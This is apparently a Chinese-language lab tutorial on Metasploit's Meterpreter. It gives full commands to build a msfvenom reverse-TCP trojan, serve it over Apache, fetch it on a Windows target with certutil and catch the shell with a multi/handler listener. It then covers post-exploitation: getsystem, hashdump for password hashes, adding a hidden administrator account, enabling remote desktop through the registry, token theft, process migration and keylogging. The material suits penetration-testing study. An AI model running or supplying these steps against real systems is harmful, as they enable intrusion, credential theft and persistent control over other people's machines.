meterpreter的使用
meterpreter是metasploit中的一个杀手锏,通常在漏洞利用成功后,会返回给攻击者一个攻击通道,其中有很多自动化操作
场景布置
生成木马
首先,我们使用metasploit中的另一个后门工具msfvenom生成一个木马,方便我们测试meterpreter
msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=1234 -f exe -o /root/shell.exe
在/root目录生成了一个shell.exe文件,执行该程序回连地址为172.16.1.103端口为1234的木马
将木马共享到windows电脑
service apache2 start打开Web服务
cp /root/shell.exe /var/www/html/,拷贝到Web服务目录
在靶机中执行命令下载木马到C:\根目录并使用dir查看
certutil -urlcache -split -f http://172.16.1.103/shell.exe C:\shell.exe
在msfconsole控制台执行监听
- [use exploit/multi/handler]
[set payload windows/meterpreter/reverse_tcp]
[set LHOST 172.16.1.103]
[set LPORT 1234]
[run] 开始监听即可
靶机执行shell.exe即可反弹meterpreter
meterpreter的使用
meterpreter最出名的就是其接口的方便性,提权,各种命令应有尽有
help查看帮助
会显示所有命令的帮助信息,例如background后台运行我们的会话
background后台运行我们的会话
如果想要连接我们的会话,使用msfconsole中学习的sessions命令可以来连接
sysinfo 查看靶机系统相关信息
exit断开并退出会话
exit会把会话直接断开
对文件操作的有这些
很容易理解,这些和linux使用的方法是一样的,这里不在一一使用
注意的是:meterpreter中的操作是相对于会话中对我们靶机的操作,而不是攻击机本身
getuid 查看当前会话权限
发下我们获取的管理员的权限,因为是管理员执行的我们的木马。如果是一个低权限用户执行的我们的木马,那么我们的获取的会话也是低权限的用户
getsystem 获取操作系统权限
system:操作系统权限
这个操作大部分情况下是不成功的,因为这个操作是只有我们获取的会话是管理员权限,才可以提权为system权限
那么为什么要获取system权限呢,获取system权限我们可以直接使用hashdump把密码hash值导出,使我们对靶机的控制更加方便
hashdump 导出系统中密码的hash值
通过 sam 文件导出系统用户的 hash值,前提是需要获取system权限,有时候获取了system权限我们也无法执行
但是,msfconsole中有导出hash的模块,需要在meterpreter中run 模块路径执行
run post/windows/gather/smart_hashdump获取hash
shell 进入会话靶机终端
这里的权限会跟随meterpreter的权限
若想返回meterpreter控制台,输入exit退出即可
在进入命令行后,中文可能出现乱码
chcp 65001将终端编码改为英文即可
run getgui -e 开启远程远程桌面
可以试一试能不能开启,权限越高,越容易开启
这里使用了netstat查看靶机端口的开放情况,可以看到3389端口已经被我们开启
开启后,如果我们通过hashdump破解的管理员或者其他用户的密码,可以使用用户名密码直接连接
当然我们也可以主机创建用户
net user hacker Admin123 /add和net localgroup administratos hacker /add
创建hacker用户并将hacker用户加入管理员组
若run getgui -e没有开启3389远程桌面,我们可以使用cmd命令打开3389服务
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
使用netstat -an查看
netstat 查看靶机端口开放状态
ps 查看靶机进程
会显示靶机运行的进程的进程号,父进程号,运行的名称,多少位,运行的用户是,运行的程序的位置
进程号很有用,后面有两个关于进程的提权
steal_token 窃取用户进程令牌
在系统中,一个程序需要用户来运行,运行到内存中就变成了进程,steal_token可以伪装为指定进程的所运行的用户
例如notepad.exe是Administrator用于运行的,那么steal_token只需要指定notepad.exe的进程号,就可以将我们的权限伪装为Administrator
ps 查看进程
可以看到svchost.exe的进程为1268,运行的用户是NT AUTHORRITY/SYSTEM,拥有system权限的system用户
steal_token 1268伪装system
在我们伪装后,权限就变为了system
migrate 内存迁移
这个内存迁移就是将我们现在反弹shell的进程转换到一个安全的进程上,作用和steal_token差不多,不一样的是steal_token只是已这个进程的权限执行命令,而我们是直接切换到了这个进程,如果将该进程杀死,我们的shell也会关闭,不过一般执行该操作也需要得到system或管理员的权限
ps 查看进程
conhost.exe的进程为2200,运行的用户是Administrator
使用内存迁移,获取administrator,这里我们的权限是system,可以说一个权限的降级
注意,这里只是为了演示进行的降级,一般情况下,肯定权限越高越好
migrate 2200
通过getuid获取到现在是Administrator权限
当使用内存迁移的时候,建议不要迁移到低权限的用户,不然权限会变低,而且无法提升权限
迁移到另一个进程将有助于 Meterpreter 与其交互。例如,如果您看到一个文字处理器在目标上运行(例如 word.exe、notepad.exe 等),您可以迁移到它并开始捕获用户发送到该进程的击键。某些 Meterpreter 版本将为您提供keyscan_start、 keyscan_stop和keyscan_dump命令选项,使 Meterpreter 像键盘记录器一样工作。迁移到另一个进程也可以帮助您拥有更稳定的 Meterpreter 会话。
要迁移到任何进程,您需要键入 migrate 命令,然后键入所需目标进程的 PID
load 加载其他插件
在meterpreter中也可插入其他插件,例如mimimatz,不用下载,在meterpreter中有内置
在help中会有mimikatz插件的帮助
mimikatz还没有学习,后续学习
